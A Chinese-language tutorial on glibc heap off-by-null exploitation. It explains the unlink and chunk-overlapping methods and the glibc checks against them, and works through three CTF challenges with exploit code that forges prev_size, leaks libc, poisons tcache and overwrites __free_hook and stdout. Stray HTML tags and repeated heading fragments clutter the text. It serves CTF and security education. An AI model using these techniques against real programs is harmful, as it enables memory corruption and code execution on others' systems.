Off-by-Null 漏洞利用技术详解<\/h1>

一、Off-by-Null 漏洞概述<\/h2>
Off-by-Null 是一种堆溢出漏洞，特点是只能溢出单个 NULL 字节（`\x00<\/code>）。这种漏洞在特定条件下可以被利用来实现内存破坏和代码执行。<\/p>`

1.1 漏洞原理<\/h3>
当分配的 chunk 大小为 0x100 的整数倍时，溢出 NULL 字节会：<\/p>

清空下一个 chunk 的 prev_inuse<\/code> 位（表示前一个 chunk 是空闲的）<\/li>
启用 prev_size<\/code> 字段<\/li>
<\/ul>
二、利用思路<\/h2>
2.1 可控制任意字节溢出的情况<\/h3>

通过修改 chunk 大小造成块结构重叠<\/li>
利用重叠泄露其他 chunk 数据<\/li>
利用重叠覆盖其他 chunk 数据<\/li>
<\/ol>
2.2 只能溢出 NULL 字节的情况<\/h3>
方法一：unlink 技术<\/h4>

先 free 前面的堆块<\/li>
利用 NULL 字节溢出清空 prev_inuse<\/code> 位<\/li>
伪造 prev_size<\/code> 字段<\/li>
触发 unlink 操作造成 chunk 重叠<\/li>
<\/ol>
关键点：<\/p>

unlink 时只检查 next_chunk(p)<\/code> 的 prev_size<\/code> 是否等于当前 chunk 的 size<\/code><\/li>
不检查按照 prev_size<\/code> 找到的 chunk 的大小是否与 prev_size<\/code> 一致<\/li>
<\/ul>
方法二：chunk overlapping<\/h4>

伪造 prev_size<\/code><\/li>
利用 chunk overlapping 将合并后的 chunk 放入 unsorted bin<\/li>
通过切割 unsorted bin 实现信息泄露或进一步利用<\/li>
<\/ol>
三、利用技术细节<\/h2>
3.1 关键宏定义<\/h3>
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
<\/span><\/span><\/span><\/span>
<\/span><\/span>#define unlink(AV, P, BK, FD) { \
<\/span><\/span><\/span>    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \
<\/span><\/span><\/span>        malloc_printerr ("corrupted size vs. prev_size"); \
<\/span><\/span><\/span>    FD = P->fd; \
<\/span><\/span><\/span>    BK = P->bk; \
<\/span><\/span><\/span>    if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
<\/span><\/span><\/span>        malloc_printerr ("corrupted double-linked list"); \
<\/span><\/span><\/span>    ... }
<\/span><\/span><\/span><\/code><\/pre>3.2 版本差异<\/h3>

在 glibc 2.28 及之前版本，没有检查 chunksize(p) != prevsize<\/code><\/li>
最新版本加入了检查，使得第二种方法无法使用：<\/li>
<\/ul>
if<\/span> (__glibc_unlikely(chunksize(p) !=<\/span> prevsize))
<\/span><\/span>    malloc_printerr("corrupted size vs. prev_size while consolidating"<\/span>);
<\/span><\/span><\/code><\/pre>四、典型利用模式<\/h2>
4.1 基本利用步骤<\/h3>

分配多个 chunk 构造特定内存布局<\/li>
释放特定 chunk 填充 tcache\/unsorted bin<\/li>
利用 off-by-null 修改关键 metadata<\/li>
触发 unlink 或合并操作<\/li>
通过重叠 chunk 实现信息泄露或控制流劫持<\/li>
<\/ol>
4.2 具体利用案例<\/h3>
案例一：hgame week3 "你满了，那我就漫出来了！"<\/h4>
# 构造初始布局<\/span>
<\/span><\/span>add(0<\/span>, 0xF8<\/span>, b<\/span>'a'<\/span>)  # 后续会被free<\/span>
<\/span><\/span>add(1<\/span>, 0x68<\/span>, b<\/span>'a'<\/span>)  # 用于伪造prev_size<\/span>
<\/span><\/span>add(2<\/span>, 0xF8<\/span>, b<\/span>'a'<\/span>)  # 目标chunk<\/span>
<\/span><\/span>
<\/span><\/span># 填充tcache<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(3<\/span>, 10<\/span>):
<\/span><\/span>    add(i, 0xF8<\/span>, b<\/span>'a'<\/span>)
<\/span><\/span>add(12<\/span>, 0x68<\/span>, b<\/span>'a'<\/span>)
<\/span><\/span>
<\/span><\/span># 释放chunk构造unsorted bin<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(3<\/span>, 10<\/span>):
<\/span><\/span>    delete(i)
<\/span><\/span>delete(0<\/span>)
<\/span><\/span>delete(1<\/span>)
<\/span><\/span>
<\/span><\/span># 伪造prev_size<\/span>
<\/span><\/span>add(1<\/span>, 0x68<\/span>, b<\/span>'a'<\/span>*<\/span>0x60<\/span> +<\/span> p64(0x170<\/span>))
<\/span><\/span>
<\/span><\/span># 触发unlink合并<\/span>
<\/span><\/span>delete(2<\/span>)
<\/span><\/span>
<\/span><\/span># 重新分配获取libc地址<\/span>
<\/span><\/span>add(0<\/span>, 0x70<\/span>, b<\/span>'a'<\/span>)
<\/span><\/span>add(2<\/span>, 0x70<\/span>, b<\/span>'a'<\/span>)
<\/span><\/span>show(1<\/span>)  # 泄露libc地址<\/span>
<\/span><\/span>
<\/span><\/span># 后续利用<\/span>
<\/span><\/span>add(3<\/span>, 0x68<\/span>, b<\/span>'a'<\/span>)  # 现在chunk 1和3指向同一内存<\/span>
<\/span><\/span><\/code><\/pre>案例二：DASCTF 2023六月挑战赛 can_you_find_me<\/h4>
# 构造初始布局<\/span>
<\/span><\/span>add(0x20<\/span>, 'aaa<\/span>\n<\/span>'<\/span>)      # 0<\/span>
<\/span><\/span>add(0x618<\/span>, '<\/span>\n<\/span>'<\/span>)        # 1 - 将被放入unsorted bin<\/span>
<\/span><\/span>add(0x4f0<\/span>, 'xxx<\/span>\n<\/span>'<\/span>)     # 2<\/span>
<\/span><\/span>add(0x20<\/span>, 'aaa<\/span>\n<\/span>'<\/span>)      # 3<\/span>
<\/span><\/span>
<\/span><\/span># 释放并重新分配<\/span>
<\/span><\/span>dele(1<\/span>)
<\/span><\/span>add(0x440<\/span>, '<\/span>\n<\/span>'<\/span>)        # 1<\/span>
<\/span><\/span>add(0x60<\/span>, '<\/span>\n<\/span>'<\/span>)         # 4<\/span>
<\/span><\/span>add(0x158<\/span>, b<\/span>'a'<\/span>*<\/span>0x150<\/span> +<\/span> p64(0x620<\/span>))  # 5 - 伪造prev_size<\/span>
<\/span><\/span>
<\/span><\/span># 触发合并<\/span>
<\/span><\/span>dele(1<\/span>)
<\/span><\/span>dele(2<\/span>)
<\/span><\/span>dele(4<\/span>)
<\/span><\/span>dele(5<\/span>)
<\/span><\/span>
<\/span><\/span># 切割unsorted bin实现tcache poison<\/span>
<\/span><\/span>add(0x440<\/span>, '<\/span>\n<\/span>'<\/span>)        # 1<\/span>
<\/span><\/span>add(0x20<\/span>, '<\/span>\x60\x07<\/span>'<\/span> +<\/span> '<\/span>\n<\/span>'<\/span>)  # 2 - 修改tcache fd<\/span>
<\/span><\/span>add(0x60<\/span>, '<\/span>\n<\/span>'<\/span>)         # 4<\/span>
<\/span><\/span>add(0x60<\/span>, p64(0xfbad1887<\/span>) +<\/span> p64(0<\/span>)*<\/span>3<\/span> +<\/span> b<\/span>'<\/span>\x00<\/span>'<\/span> +<\/span> b<\/span>'<\/span>\n<\/span>'<\/span>)  # 5 - 修改stdout泄露libc<\/span>
<\/span><\/span><\/code><\/pre>案例三：ciscn2024华北 onebook<\/h4>
# 构造初始布局<\/span>
<\/span><\/span>add(0<\/span>, 0x4f8<\/span>, b<\/span>'a'<\/span>)
<\/span><\/span>add(1<\/span>, 0xf8<\/span>, b<\/span>'a'<\/span>)
<\/span><\/span>add(2<\/span>, 0x4f8<\/span>, b<\/span>'a'<\/span>)
<\/span><\/span>add(3<\/span>, 0x20<\/span>, b<\/span>'a'<\/span>)
<\/span><\/span>
<\/span><\/span># 释放chunk<\/span>
<\/span><\/span>delete(0<\/span>)
<\/span><\/span>delete(1<\/span>)
<\/span><\/span>
<\/span><\/span># 伪造prev_size<\/span>
<\/span><\/span>add(1<\/span>, 0xf8<\/span>, b<\/span>'a'<\/span>*<\/span>0xf0<\/span> +<\/span> p64(0x600<\/span>))
<\/span><\/span>
<\/span><\/span># 触发合并<\/span>
<\/span><\/span>delete(2<\/span>)
<\/span><\/span>
<\/span><\/span># 泄露libc<\/span>
<\/span><\/span>add(0<\/span>, 0x4f8<\/span>, b<\/span>'a'<\/span>)
<\/span><\/span>show(1<\/span>)
<\/span><\/span>
<\/span><\/span># 后续利用<\/span>
<\/span><\/span>delete(0<\/span>)
<\/span><\/span>free_hook =<\/span> libcbase +<\/span> libc.<\/span>sym['__free_hook'<\/span>]
<\/span><\/span>payload =<\/span> b<\/span>'a'<\/span>*<\/span>0x4f8<\/span> +<\/span> p64(0x101<\/span>) +<\/span> p64(free_hook)
<\/span><\/span>add(0<\/span>, 0x6f8<\/span>, payload)
<\/span><\/span>delete(1<\/span>)
<\/span><\/span>edit(0<\/span>, payload)
<\/span><\/span><\/code><\/pre>五、防御与绕过<\/h2>
5.1 现代glibc的防御措施<\/h3>

对 prev_size<\/code> 和实际 chunk 大小的一致性检查<\/li>
对 tcache 和 fastbin 的双重释放检测<\/li>
对 unsorted bin 中 chunk 的完整性检查<\/li>
<\/ol>
5.2 绕过技巧<\/h3>

利用 tcache poisoning 实现任意地址分配<\/li>
通过切割 unsorted bin 修改关键内存<\/li>
结合其他漏洞如 UAF 增强利用效果<\/li>
针对特定版本 glibc 的未修复漏洞<\/li>
<\/ol>
六、总结<\/h2>
Off-by-Null 是一种需要精细内存操作的漏洞利用技术，关键在于：<\/p>

精确控制堆布局<\/li>
巧妙伪造 chunk metadata<\/li>
利用合并\/拆分操作实现内存破坏<\/li>
结合信息泄露和控制流劫持完成利用<\/li>
<\/ol>
掌握这些技术需要对 glibc 内存管理机制有深入理解，并通过大量实践积累经验。<\/p>

Off-by-Null 漏洞利用技术详解<\/h1>

一、Off-by-Null 漏洞概述<\/h2> Off-by-Null 是一种堆溢出漏洞，特点是只能溢出单个 NULL 字节（\x00<\/code>）。这种漏洞在特定条件下可以被利用来实现内存破坏和代码执行。<\/p>

二、利用思路<\/h2>

2.2 只能溢出 NULL 字节的情况<\/h3>

三、利用技术细节<\/h2>

四、典型利用模式<\/h2>

4.2 具体利用案例<\/h3>

五、防御与绕过<\/h2>

一、Off-by-Null 漏洞概述<\/h2>
Off-by-Null 是一种堆溢出漏洞，特点是只能溢出单个 NULL 字节（`\x00<\/code>）。这种漏洞在特定条件下可以被利用来实现内存破坏和代码执行。<\/p>`